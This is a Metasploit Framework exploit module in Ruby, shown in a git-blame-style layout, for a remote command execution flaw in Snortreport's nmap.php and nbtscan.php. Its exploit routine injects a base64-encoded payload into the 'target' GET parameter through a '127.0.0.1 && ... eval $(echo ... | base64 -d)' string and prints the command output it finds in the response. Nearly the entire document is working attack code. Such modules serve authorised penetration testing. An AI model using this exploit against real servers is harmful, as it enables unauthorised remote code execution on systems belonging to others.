2011-10-09 06:10:18 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-10-09 06:10:18 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Snortreport nmap.php/nbtscan.php Remote Command Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an arbitrary command execution vulnerability in
|
|
|
|
nmap.php and nbtscan.php scripts.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Paul Rascagneres' #itrust consulting during hack.lu 2011
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['OSVDB', '67739'],
|
|
|
|
['URL', 'http://www.symmetrixtech.com/articles/news-016.html']
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'RequiredCmd' => 'generic perl ruby bash telnet python',
|
|
|
|
}
|
|
|
|
},
|
|
|
|
'Platform' => ['unix', 'linux'],
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Targets' => [['Automatic',{}]],
|
|
|
|
'DisclosureDate' => 'Sep 19 2011',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
|
|
|
|
],self.class)
|
|
|
|
end
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
|
|
|
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
start = "127.0.0.1 && echo XXXXX && eval $(echo "
|
|
|
|
last = " | base64 -d) && echo ZZZZZ"
|
|
|
|
custom_payload = start << base64_payload << last
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => normalize_uri(datastore['URI']),
|
|
|
|
'vars_get' =>
|
|
|
|
{
|
|
|
|
'target' => custom_payload
|
|
|
|
}
|
|
|
|
},10)
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if (res)
|
|
|
|
to_print=false
|
|
|
|
already_print=false
|
|
|
|
part=res.body.gsub("<BR>","")
|
|
|
|
part.each_line do |line|
|
|
|
|
if line =~ /ZZZZZ/
|
|
|
|
to_print=false
|
|
|
|
end
|
|
|
|
if to_print == true
|
|
|
|
print(line)
|
|
|
|
end
|
|
|
|
if line =~ /XXXXX/
|
|
|
|
already_print=true
|
|
|
|
to_print=true
|
|
|
|
end
|
|
|
|
end
|
2011-10-09 06:10:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if already_print == false
|
|
|
|
print_error("This server may not be vulnerable")
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error("No response from the server")
|
|
|
|
end
|
|
|
|
end
|
2011-10-09 06:10:18 +00:00
|
|
|
end
|